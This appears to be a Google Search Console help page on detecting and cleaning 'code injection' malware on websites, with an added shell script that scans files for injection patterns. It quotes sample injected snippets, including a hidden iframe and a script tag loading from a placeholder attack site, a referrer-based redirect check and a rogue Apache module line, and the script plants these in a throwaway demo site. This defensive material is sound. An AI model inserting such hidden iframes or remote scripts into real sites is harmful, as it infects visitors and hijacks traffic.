Malware infection type: Code injection

What does it mean to have pages marked with malware infection type "Code injection" in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

For more general information on malware, see Assess the damage (hacked with malware).

How do I investigate the "code injection" malware type?

First, avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Consider confirming the behavior by using cURL or Wget to perform HTTP requests (for example, to fetch a page). These freely available tools are helpful in diagnosing redirects, and have the flexibility to include referrer or user-agent information. By serving malicious content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and malware scanners. (Your site will need to be online to use these tools.)

For example:

$ curl -v --referer "<referer-field>" \
    --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" \
    "<your-url>"

Or, with an example value:

$ curl -v --referer "" \
    --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" \
    "<your-url>"

Next, log in to your filesystem. Investigate all resources that write to the "code injection" infected URLs. Some examples of malicious code injections include the following:

  • iframe to an attack site:

    <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>

  • JavaScript or another scripting language that calls and runs scripts from an attack site:

    <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>

  • Scripting that redirects the browser to an attack site:

    if (document.referrer.match(/google\.com/)) {

  • Malicious code that’s obfuscated to avoid detection

  • Shared object files designed to randomly write harmful code to otherwise benign scripts:

    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/
    AddModule mod_harmful.c

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are "script", "eval", and "unescape." For example, on Unix-based systems:

$ grep -irn "iframe" ./ | less
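
The keyword search above can be extended to cover each injection type in the list in one pass. The script below is an added example, not part of the original help page; its labels, regular expressions, function names and sample files are constructed for illustration, and every hit is a lead to compare against a known-good copy rather than a verdict.

```shell
#!/bin/sh
# Triage scan for the injection patterns this page lists. Labels and regexes
# are this example's own; tune them to your site before relying on them.

# scan_injection DIR: prints "label<TAB>file:line:text" for every match.
scan_injection() {
  while read -r label regex; do
    grep -rEinI -e "$regex" "$1" 2>/dev/null |
      while IFS= read -r hit; do printf '%s\t%s\n' "$label" "$hit"; done
  done <<'EOF'
hidden-iframe <iframe[^>]*(display: *none|(height|width)=["']?0["' >])
remote-script <script[^>]*src=["']?https?://
referrer-check document\.referrer
obfuscation (eval|unescape) *\(
apache-module ^[[:space:]]*(LoadModule|AddModule)[[:space:]]
EOF
}

# make_sample_site: builds a constructed web root for the demo, prints its path.
make_sample_site() {
  d=$(mktemp -d) || return 1
  mkdir -p "$d/conf"
  cat > "$d/index.html" <<'EOF'
<p>Welcome</p>
<iframe frameborder="0" height="0" src="http://attack-site.example/path/file" style="display:none" width="0"></iframe>
<script type='text/javascript' src='http://malware-attack-site.example/js/x55.js'></script>
EOF
  cat > "$d/nav.js" <<'EOF'
if (document.referrer.match(/google\.com/)) { /* redirect logic would be here */ }
var s = unescape("%3Cp%3E");
EOF
  printf '%s\n' '# constructed config' 'LoadModule harmful_module modules/mod_constructed.so' > "$d/conf/httpd.conf"
  cat > "$d/about.html" <<'EOF'
<p>Clean page with a visible <iframe width="560" height="315" src="/video"></iframe></p>
EOF
  echo "$d"
}

# Demo on the constructed site: five hits expected, none in about.html.
site=$(make_sample_site) && scan_injection "$site"; rm -rf "$site"
```

The remote-script and apache-module rules also match legitimate external scripts and modules, so review those hits against a clean backup of the same files.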

How do I clean my site of the "code injection" malware type?

When ready to clean up your site, you can either replace affected files with the last good backup or you can remove the code injection from each page and all related scripting functions or files. If you modified server configuration files, you may need to restart your webserver for the changes to become effective.

Please be aware that removing the malicious code doesn't address the underlying vulnerability that allowed the hacker to initially compromise your site. Without correcting the root cause, your site may be compromised again in the future. For more information on cleaning your entire site, not just this malware type, see Help for Hacked Sites.
